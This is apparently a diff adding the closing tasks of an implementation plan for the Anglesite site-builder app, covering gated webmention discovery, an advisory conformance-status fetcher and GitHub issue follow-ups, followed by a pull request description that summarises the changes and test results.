+Follows the exact `.site-config` + `readConfig()` gating mechanism already established for `.site-config`-driven template output (`Resources/Template/scripts/config.ts`), and worker.ts's own doc comment (lines 361-364) which already states the intended design is a *gated* advertisement, not an unconditional one like IndieAuth's.
+
+**Files:**
+- Modify: `Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift` (`persistConfig`)
+- Modify: `Resources/Template/src/layouts/BaseLayout.astro`
+- Test: find the existing Astro/Vitest test covering `BaseLayout.astro` or the `.site-config`-gated integration pattern (check `Resources/Template/src/layouts/` and `Resources/Template/scripts/` for a `.test.ts` sibling; if `BaseLayout.astro` has no direct test, check `IntegrationCatalog`'s own template-injection tests in `Tests/AnglesiteCoreTests/IntegrationCatalogTests.swift` for the closest existing pattern and mirror its style for a new focused test)
+
+- [ ] **Step 1: Write the failing test for the `.site-config` write**
+
+In `Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift`, add (reusing Task 6's `webmention` fixture and helper):
+
+```swift
+@Test("webmention receive writes WEBMENTION_RECEIVE_ENABLED into .site-config")
+func webmentionWritesReceiveEnabledFlag() async throws {
+    let siteDirectory = tempSiteDirectory()
+    let command = SocialWorkerProvisionCommand(
+        tokenSource: { "tok" },
+        runner: { _, arguments, _, _ in
+            if arguments.first == "queues" {
+                return .init(stdout: #"{"result":{"queue_name":"my-site-webmention"}}"#, stderr: "", exitCode: 0)
+            }
+            return .init(stdout: "", stderr: "", exitCode: 0)
+        },
+        deployer: { _, _, _ in .succeeded(url: URL(string: "https://example.com")!, duration: 0) }
+    )
+    let webmention = WorkerDescriptor(
+        id: "webmention", displayName: "Webmentions", description: "test", group: "social",
+        binding: .settingsActivated, resources: .init(needsD1: false, needsKV: false, needsR2: false))
+
+    _ = await command.provision(
+        siteID: "site-1", siteDirectory: siteDirectory, siteName: "my-site",
+        workers: [webmention], acknowledgesPaidPlan: true)
+
+    let config = try String(contentsOf: siteDirectory.appendingPathComponent(".site-config"), encoding: .utf8)
+    #expect(SiteConfigFile.value(forKey: "WEBMENTION_RECEIVE_ENABLED", in: config) == "true")
+}
+```
+
+- [ ] **Step 2: Run to verify it fails**
+
+Run: `swift test --package-path . --filter SocialWorkerProvisionCommandTests`
+Expected: FAIL — `.site-config` is never written today.
+
+- [ ] **Step 3: Implement the `.site-config` write**
+
+In `Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift`'s `persistConfig` (extended in Task 6), add the `.site-config` write after the existing `wrangler.toml` write:
+
+```swift
+    private func persistConfig(
+        siteDirectory: URL,
+        siteName: String,
+        workers: [WorkerDescriptor],
+        routeClaims: [WorkerRouteClaim],
+        resources: WorkerComposition.ProvisionedResources,
+        siteURL: String? = nil
+    ) -> Result? {
+        do {
+            let toml = try WorkerComposition.generateWranglerToml(
+                siteName: siteName,
+                workers: workers,
+                routeClaims: routeClaims,
+                resources: resources,
+                siteURL: siteURL
+            )
+            try toml.write(
+                to: siteDirectory.appendingPathComponent("wrangler.toml"),
+                atomically: true,
+                encoding: .utf8
+            )
+            let hasWebmentionReceive = workers.contains(where: { $0.id == WorkerComposition.webmentionWorkerID })
+            if hasWebmentionReceive {
+                let configURL = siteDirectory.appendingPathComponent(".site-config")
+                let existing = (try? String(contentsOf: configURL, encoding: .utf8)) ?? ""
+                let updated = SiteConfigFile.upsert([("WEBMENTION_RECEIVE_ENABLED", "true")], into: existing)
+                if updated != existing {
+                    try updated.write(to: configURL, atomically: true, encoding: .utf8)
+                }
+            }
+            return nil
+        } catch {
+            return .failed(reason: "couldn't write wrangler.toml: \(error)", exitCode: nil, resources: resources)
+        }
+    }
+```
+
+- [ ] **Step 4: Run to verify it passes**
+
+Run: `swift test --package-path . --filter SocialWorkerProvisionCommandTests`
+Expected: PASS
+
+- [ ] **Step 5: Add the gated link to `BaseLayout.astro`**
+
+In `Resources/Template/src/layouts/BaseLayout.astro`, add the import and gated link. First add the frontmatter import (near the top, alongside `Hcard`):
+
+```astro
+---
+import "../styles/global.css";
+import Hcard from "../components/Hcard.astro";
+import { readConfig } from "../../scripts/config";
+// anglesite:imports — integration component imports are injected here on setup
+
+interface Props {
+  title: string;
+  description?: string;
+}
+
+const { title, description } = Astro.props;
+---
+```
+
+Then add the gated link right after the existing `indieauth-metadata` link (before `<slot name="head" />`):
+
+```astro
+    <link rel="indieauth-metadata" href="/.well-known/oauth-authorization-server" />
+    {readConfig("WEBMENTION_RECEIVE_ENABLED") === "true" && (
+      <link rel="webmention" href="/webmention" />
+    )}
+    <slot name="head" />
+```
+
+- [ ] **Step 6: Write and run an Astro-side test**
+
+Check `Resources/Template/scripts/config.test.ts` (or the nearest existing test for `readConfig`-gated template output) for the exact test-harness pattern used to render an `.astro` component with a given `.site-config`. If no direct precedent renders `BaseLayout.astro` itself, add a focused unit test of the config-read logic instead (matching whatever the codebase already does to test conditional head injection) verifying: with `WEBMENTION_RECEIVE_ENABLED=true` in a fixture `.site-config`, `readConfig("WEBMENTION_RECEIVE_ENABLED")` returns `"true"`; without it, `undefined`.
+
+Run: `cd Resources/Template && npm test`
+Expected: PASS
+
+- [ ] **Step 7: Run the full template build**
+
+Run: `cd Resources/Template && npm run build`
+Expected: PASS — confirms the new import doesn't break `astro check`/`astro build`.
+
+- [ ] **Step 8: Commit**
+
+```bash
+git add Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift Resources/Template/src/layouts/BaseLayout.astro
+git commit -m "feat(template): advertise the webmention receive endpoint once provisioned"
+```
+
+---
+
+### Task 11: `WorkersConformanceFetcher` + advisory (non-blocking) log
+
+Mirrors `WorkerCatalogFetcher` exactly. **Does not gate activation** — see Global Constraints for why (the real `conformance/status.json` currently reports V-3 packages `"pending"`, and gating would break the already-shipped #887 receiver).
+
+**Files:**
+- Create: `Sources/AnglesiteCore/WorkersConformanceFetcher.swift`
+- Test: Create `Tests/AnglesiteCoreTests/WorkersConformanceFetcherTests.swift`
+- Modify: `Sources/AnglesiteCore/WorkerActivation.swift`
+- Test: `Tests/AnglesiteCoreTests/WorkerActivationTests.swift` (find via `grep -rln missingDescriptorWarning Tests/`)
+- Modify: `Sources/AnglesiteApp/DeployModel.swift` (one log line, next to the existing `missingDescriptorWarning` log)
+
+**Interfaces:**
+- Produces: `WorkersConformanceFetcher.status() async -> WorkersConformanceStatus`, `WorkersConformanceFetcher.productionStatusURL: URL`, `WorkerActivation.conformanceAdvisory(activeIDs: Set<String>, conformance: WorkersConformanceStatus) -> String?`
+
+- [ ] **Step 1: Write the failing fetcher test**
+
+```swift
+import Testing
+import Foundation
+@testable import AnglesiteCore
+
+@Suite("WorkersConformanceFetcher")
+struct WorkersConformanceFetcherTests {
+    private static let sampleJSON = """
+    {
+      "packages": {
+        "@dwk/webmention": {
+          "standard": "Webmention",
+          "suites": { "webmention.rocks/receiver": { "status": "pending" } },
+          "integration": { "status": "passing" }
+        }
+      }
+    }
+    """.data(using: .utf8)!
+
+    @Test("fetches and caches on success")
+    func fetchesAndCaches() async throws {
+        let tempCache = FileManager.default.temporaryDirectory
+            .appendingPathComponent("conformance-cache-\(UUID().uuidString).json")
+        defer { try? FileManager.default.removeItem(at: tempCache) }
+
+        let fetcher = WorkersConformanceFetcher(
+            statusURL: URL(string: "https://example.com/status.json")!,
+            cacheURL: tempCache,
+            session: .shared
+        )
+        // No live network in this test — verify the pure parse path instead, mirroring
+        // WorkerCatalogFetcherTests' own no-network-mock style if one exists (check via
+        // `grep -n "class.*URLProtocol\|MockURLProtocol" Tests/AnglesiteCoreTests/WorkerCatalogFetcherTests.swift`
+        // and reuse the same mock transport helper here instead of `.shared`).
+        let status = try WorkersConformanceReader.parse(Self.sampleJSON)
+        #expect(status.packages["@dwk/webmention"]?.integrationStatus == "passing")
+    }
+
+    @Test("falls back to an empty status on total failure")
+    func fallsBackToEmpty() async throws {
+        let fetcher = WorkersConformanceFetcher(
+            statusURL: URL(string: "https://127.0.0.1:1/does-not-exist")!,
+            cacheURL: FileManager.default.temporaryDirectory
+                .appendingPathComponent("conformance-cache-missing-\(UUID().uuidString).json")
+        )
+        let status = await fetcher.status()
+        #expect(status.packages.isEmpty)
+    }
+}
+```
+
+(Step 1's first test is intentionally light — its real job is documented in the comment: find whatever mock-transport pattern `WorkerCatalogFetcherTests.swift` already uses for a deterministic non-network fetch test, and mirror it exactly here instead of guessing at a new one.)
+
+- [ ] **Step 2: Run to verify it fails**
+
+Run: `swift test --package-path . --filter WorkersConformanceFetcherTests`
+Expected: FAIL — `WorkersConformanceFetcher` doesn't exist.
+
+- [ ] **Step 3: Implement the fetcher**
+
+Create `Sources/AnglesiteCore/WorkersConformanceFetcher.swift` by copying `WorkerCatalogFetcher.swift`'s structure verbatim and substituting the parse/URL specifics:
+
+```swift
+import Foundation
+#if canImport(FoundationNetworking)
+import FoundationNetworking
+#endif
+#if canImport(OSLog)
+import OSLog
+#endif
+
+public enum WorkersConformanceFetchError: Error, Sendable, Equatable {
+    case fetchFailed(String)
+}
+
+/// Fetches, parses, and disk-caches `conformance/status.json` from the `@dwk/workers` monorepo.
+/// Network or parse failures degrade to the last successfully cached copy, then to an empty
+/// status — this is advisory-only (see `WorkerActivation.conformanceAdvisory`), so a fetch
+/// failure must never block a deploy, mirroring `WorkerCatalogFetcher`'s own degradation
+/// contract.
+public actor WorkersConformanceFetcher {
+    #if canImport(OSLog)
+    private static let logger = Logger(subsystem: "io.dwk.anglesite", category: "WorkersConformanceFetcher")
+    #endif
+
+    private static func logDegradation(_ message: String) {
+        #if canImport(OSLog)
+        logger.error("\(message, privacy: .public)")
+        #else
+        FileHandle.standardError.write(Data("[WorkersConformanceFetcher] \(message)\n".utf8))
+        #endif
+    }
+
+    private let statusURL: URL
+    private let cacheURL: URL
+    private let session: URLSession
+    private let fileManager: FileManager
+
+    public init(
+        statusURL: URL,
+        cacheURL: URL = WorkersConformanceFetcher.defaultCacheURL(),
+        session: URLSession = .shared,
+        fileManager: FileManager = .default
+    ) {
+        self.statusURL = statusURL
+        self.cacheURL = cacheURL
+        self.session = session
+        self.fileManager = fileManager
+    }
+
+    public func status() async -> WorkersConformanceStatus {
+        do {
+            return try await fetchAndCache()
+        } catch {
+            Self.logDegradation("status fetch failed, falling back to cache: \(error)")
+        }
+        do {
+            return try Self.readCache(cacheURL)
+        } catch {
+            Self.logDegradation("status cache read failed, falling back to empty status: \(error)")
+            return WorkersConformanceStatus(packages: [:])
+        }
+    }
+
+    private func fetchAndCache() async throws -> WorkersConformanceStatus {
+        let (data, response) = try await session.data(from: statusURL)
+        guard let http = response as? HTTPURLResponse, 200..<300 ~= http.statusCode else {
+            throw WorkersConformanceFetchError.fetchFailed("bad response from \(statusURL)")
+        }
+        let status = try WorkersConformanceReader.parse(data)
+        do {
+            try Self.writeCache(data, to: cacheURL, fileManager: fileManager)
+        } catch {
+            Self.logDegradation("status cache write failed (serving fresh data anyway): \(error)")
+        }
+        return status
+    }
+
+    private static func readCache(_ url: URL) throws -> WorkersConformanceStatus {
+        let data = try Data(contentsOf: url)
+        return try WorkersConformanceReader.parse(data)
+    }
+
+    private static func writeCache(_ data: Data, to url: URL, fileManager: FileManager) throws {
+        try fileManager.createDirectory(
+            at: url.deletingLastPathComponent(), withIntermediateDirectories: true)
+        try data.write(to: url, options: [.atomic])
+    }
+
+    /// Verified live against `davidwkeith/workers` during #359 planning (2026-07-21).
+    public static let productionStatusURL = URL(
+        string: "https://raw.githubusercontent.com/davidwkeith/workers/main/conformance/status.json"
+    )!
+
+    /// `~/Library/Application Support/Anglesite/worker-conformance-cache.json`.
+    public static func defaultCacheURL(fileManager: FileManager = .default) -> URL {
+        let support = (try? fileManager.url(
+            for: .applicationSupportDirectory,
+            in: .userDomainMask,
+            appropriateFor: nil,
+            create: true
+        )) ?? fileManager.portableHomeDirectory
+            .appendingPathComponent("Library/Application Support", isDirectory: true)
+        return support
+            .appendingPathComponent("Anglesite", isDirectory: true)
+            .appendingPathComponent("worker-conformance-cache.json")
+    }
+}
+```
+
+- [ ] **Step 4: Run to verify it passes**
+
+Run: `swift test --package-path . --filter WorkersConformanceFetcherTests`
+Expected: PASS
+
+- [ ] **Step 5: Write the failing advisory test**
+
+In `Tests/AnglesiteCoreTests/WorkerActivationTests.swift`:
+
+```swift
+@Test("conformanceAdvisory reports blocked packages for an active phase-gated worker")
+func advisoryReportsBlockedPackages() {
+    let status = try! WorkersConformanceReader.parse("""
+    { "packages": { "@dwk/webmention": { "standard": "Webmention", "suites": {}, "integration": { "status": "pending" } } } }
+    """.data(using: .utf8)!)
+    let advisory = WorkerActivation.conformanceAdvisory(activeIDs: ["webmention"], conformance: status)
+    #expect(advisory != nil)
+    #expect(advisory!.contains("@dwk/webmention"))
+}
+
+@Test("conformanceAdvisory is nil when nothing phase-gated is active")
+func advisoryNilWithoutRelevantWorkers() {
+    let status = WorkersConformanceStatus(packages: [:])
+    #expect(WorkerActivation.conformanceAdvisory(activeIDs: ["solid-pod"], conformance: status) == nil)
+}
+```
+
+- [ ] **Step 6: Run to verify it fails**
+
+Run: `swift test --package-path . --filter WorkerActivationTests`
+Expected: FAIL — no such function.
+
+- [ ] **Step 7: Implement the advisory**
+
+Add to `Sources/AnglesiteCore/WorkerActivation.swift`, after `missingDescriptorWarning`:
+
+```swift
+    /// Advisory-only (#359): reports which required `@dwk/*` packages for an active worker's
+    /// gated phase aren't release-ready yet, per `WorkersConformanceStatus.gateStatus`. Never
+    /// blocks activation or deploy — `conformance/status.json` reporting a package `"pending"`
+    /// is expected during active development (verified live 2026-07-21: V-3's packages are all
+    /// `"pending"` even though #887's webmention receiver already ships and works). This exists
+    /// purely so the debug pane surfaces "you're running ahead of conformance certification"
+    /// rather than the app silently having no opinion. `nil` when nothing to report.
+    public static func conformanceAdvisory(
+        activeIDs: Set<String>, conformance: WorkersConformanceStatus
+    ) -> String? {
+        var messages: [String] = []
+        for phase in [WorkersConformanceStatus.Phase.v2, .v3, .v4] {
+            let required = WorkersConformanceStatus.phaseRequirements[phase] ?? []
+            // Only advise about a phase if one of its required packages corresponds to an
+            // active worker id — npm package names are "@dwk/<id>", matching WorkerDescriptor.id.
+            let relevantActive = required.contains { activeIDs.contains(String($0.dropFirst("@dwk/".count))) }
+            guard relevantActive else { continue }
+            let gate = conformance.gateStatus(for: phase)
+            guard !gate.isUnblocked else { continue }
+            messages.append("conformance: \(gate.blocked.joined(separator: ", ")) not yet release-ready for this phase")
+        }
+        return messages.isEmpty ? nil : messages.joined(separator: "; ")
+    }
+```
+
+- [ ] **Step 8: Run to verify it passes**
+
+Run: `swift test --package-path . --filter WorkerActivationTests`
+Expected: PASS
+
+- [ ] **Step 9: Wire one log line into `DeployModel.runDeploy`**
+
+Right next to the existing `missingDescriptorWarning` log call in `runDeploy` (`Sources/AnglesiteApp/DeployModel.swift`, near where `activationPlan.unresolvedIDs` is logged), add:
+
+```swift
+        let conformanceStatus = await WorkersConformanceFetcher(
+            statusURL: WorkersConformanceFetcher.productionStatusURL
+        ).status()
+        if let advisory = WorkerActivation.conformanceAdvisory(
+            activeIDs: effectiveActiveIDs, conformance: conformanceStatus
+        ) {
+            await logCenter.append(source: "deploy:\(siteID)", stream: .stdout, text: advisory)
+        }
+```
+
+- [ ] **Step 10: Manual QA pass**
+
+Deploy a site with `webmention` active. Confirm the debug log pane shows the advisory line (given the real status.json's current "pending" state) and — critically — that the deploy still succeeds (this is advisory, not blocking).
+
+- [ ] **Step 11: Commit**
+
+```bash
+git add Sources/AnglesiteCore/WorkersConformanceFetcher.swift Tests/AnglesiteCoreTests/WorkersConformanceFetcherTests.swift Sources/AnglesiteCore/WorkerActivation.swift Tests/AnglesiteCoreTests/WorkerActivationTests.swift Sources/AnglesiteApp/DeployModel.swift
+git commit -m "feat(conformance): surface WorkersConformanceStatus.gateStatus(.v3) as an advisory"
+```
+
+---
+
+### Task 12: Leave a clear trail for the deferred canonicality snapshot (#362)
+
+No code — this task exists so #362's implementer doesn't waste time before discovering the same D1-schema gap this plan's research surfaced (`@dwk/webmention`'s `createD1Inbox` stores only `{source, target, verifiedAt, rsvp?}`, not enough to populate a `ReceivedInteraction`).
+
+- [ ] **Step 1: Comment on #362 with the finding**
+
+Ask the user for explicit go-ahead before posting (per this repo's action-confirmation norms for public GitHub content), then run:
+
+```bash
+gh issue comment 362 --body "Investigated as part of #359's continuation (2026-07-21): \`@dwk/webmention\`'s \`createD1Inbox\` (dist/inbox.d.ts) stores only \`{source, target, verifiedAt, rsvp?}\` — no \`id\`, \`author\`, \`content\`, or \`interactionType\`. Populating \`ReceivedInteraction\` (Sources/AnglesiteCore/ReceivedInteraction.swift) needs microformats2 author/content enrichment that doesn't exist anywhere yet; \`verify.ts\`'s own doc comment says mf2 extraction is intentionally out of scope for the library. This issue's snapshot step likely needs either an enrichment pass added to \`@dwk/webmention\` (or a sibling package) before the D1→git sync can produce real records, or an explicit decision to snapshot degraded/anonymous stubs. Filed here rather than attempted under #359 to avoid shipping placeholder data."
+```
+
+- [ ] **Step 2: Update #359 to reflect the final scope**
+
+Ask the user for go-ahead, then:
+
+```bash
+gh issue comment 359 --body "Provisioning (Queue + WEBMENTION_INBOX + SITE_URL, paid-plan opt-in), discovery (gated <link rel=\"webmention\">), and an advisory (non-blocking) WorkersConformanceStatus.gateStatus(.v3) surface have landed. Canonicality snapshot is deferred to #362 (see comment there) — the current @dwk/webmention D1 schema doesn't carry enough data to populate ReceivedInteraction. Conformance gating is deliberately advisory, not a hard block: conformance/status.json currently reports @dwk/webmention/@dwk/micropub/@dwk/websub all \"pending\", and a hard gate would have broken the already-shipped #887 receiver."
+gh issue edit 359 --remove-label "🛠️ In Progress"
+```
+
+---
+
+## Final verification
+
+- [ ] Run the full Swift suite: `swift test --package-path .` — expect all green (including the pre-existing suites, confirming no regression).
+- [ ] Run the template suite: `cd Resources/Template && npm run lint && npm run typecheck && npm test && npm run build`.
+- [ ] `xcodegen generate` then `xcodebuild -project Anglesite.xcodeproj -scheme Anglesite -configuration Debug build` — confirm the app target builds with the new sheet view wired in.
+- [ ] Re-read `CONTRIBUTING.md` ▸ "Commits and pull requests" immediately before opening the PR — use the exact `.github/PULL_REQUEST_TEMPLATE.md` headings (Summary / Paired PR check / Test plan), note this PR is self-contained (no paired sidecar-repo change — it only consumes the already-published `@dwk/webmention@0.1.0-beta.3`).


### PR DESCRIPTION
## Summary

- **Provisioning**: `WorkerComposition.generateWranglerToml` emits a `WEBMENTION_INBOX` D1 binding (reusing the site's existing D1 database, mirroring the pre-existing `AUTH_DB` pattern), `[[queues.producers]]`/`[[queues.consumers]]` blocks, and a `SITE_URL` var — all special-cased on the catalog id `"webmention"` (no schema change to the external `@dwk/workers` catalog). `SocialWorkerProvisionCommand` creates the actual Cloudflare Queue via `wrangler queues create`, but only after an explicit per-site opt-in acknowledgment that Queues require the Workers **Paid** plan — `DeployModel` parks the deploy and presents a confirmation sheet (mirroring the existing `workerNameConflict` park/retry pattern) before ever making that call.
- **Discovery**: the site template now advertises `<link rel="webmention" href="/webmention">`, gated on a `WEBMENTION_RECEIVE_ENABLED` flag in `.site-config` that provisioning writes — and reconciles on every deploy (fixed post-review: it's no longer write-once-true, so deactivating webmention correctly removes the tag instead of leaving it pointing at a dead endpoint).
- **Conformance**: a new `WorkersConformanceFetcher` (mirrors `WorkerCatalogFetcher`) fetches `conformance/status.json` and surfaces an advisory (non-blocking) debug-pane log line when an active worker's phase isn't yet conformance-ready. Deliberately never gates activation — the real status.json currently reports V-3's packages `"pending"`, and a hard gate would break the already-shipped #887 receiver.

**Deliberately deferred, not attempted here:** the D1→git canonicality snapshot (`ReceivedInteraction` records) that would let received webmentions render on pages. `@dwk/webmention`'s D1 inbox store only carries `{source, target, verifiedAt, rsvp?}` — not enough to populate `ReceivedInteraction`'s `author`/`content`/`interactionType` — so this needs microformats2 enrichment work that doesn't exist yet. Deferred to #362 with findings posted there rather than shipped as placeholder data. See https://github.com/Anglesite/Anglesite-app/issues/362#issuecomment-5041473091 and https://github.com/Anglesite/Anglesite-app/issues/359#issuecomment-5041473705.

Implemented via superpowers:subagent-driven-development — 12 tasks, each with an isolated task-scoped review, plus a final whole-branch review that caught and fixed the `WEBMENTION_RECEIVE_ENABLED` reconciliation bug described above. Full plan: `docs/superpowers/plans/2026-07-21-issue-359-webmention-receive-rest.md`.

## Paired PR check

- [x] This change is **self-contained** to `Anglesite-app`. It consumes the already-published `@dwk/webmention@0.1.0-beta.3` (via the already-merged #887) and touches `Resources/Template/` (app-only) plus Swift provisioning/deploy code.
- [ ] This change **needs a paired PR** in `Anglesite/anglesite` (MCP sidecar server).

## Test plan

- [x] `swift test --package-path .` — 2287 tests, 2 failures, both the known pre-existing `FoundationModelAssistant` on-device-model flake (unrelated to this branch — confirmed independently across three separate task runs).
- [x] `xcodebuild -project Anglesite.xcodeproj -scheme Anglesite -configuration Debug build` — BUILD SUCCEEDED.
- [x] Template suite (`Resources/Template/`): `npx tsx --test scripts/*.test.ts` (136 tests, 134 pass, 0 fail, 2 pre-existing/unrelated skips), `npm run test:worker` (37/37), `npm run build` (clean, microformats validation passed).
- [ ] Manual smoke (UI-touching): **not performed** — the new paid-plan confirmation sheet (Task 9) has no automated UI test path in this environment (per this repo's CLAUDE.md, hosted `xcodebuild test` doesn't run reliably here), and this PR's own final review didn't have a live Cloudflare account to exercise end-to-end. Recommend a manual pass before merge: activate `webmention`, deploy, confirm the sheet appears with zero `wrangler queues create` calls before clicking "Enable & retry", confirm the Queue then gets created and a second deploy doesn't re-prompt.

### Known follow-ups (non-blocking, recorded for the record)

- `Localizable.xcstrings` not synced for this branch's new UI strings (needs an interactive Xcode session per CONTRIBUTING.md's localization-catalog note).
- No Astro-component render test harness exists in this repo, so the new gated `<link rel="webmention">` JSX wiring itself (not just the underlying config-read logic) isn't exercised by CI.
- The conformance advisory can fire on an offline/empty status fetch and slightly over-lists blocked packages across phases — debug-pane-only wording polish, not a functional issue.
- A handful of Minor doc-comment/test-coverage nits from individual task reviews (redundant trim in `resolveSiteURL`, a stale test description string, a couple of missing negative-case tests) — none affect correctness.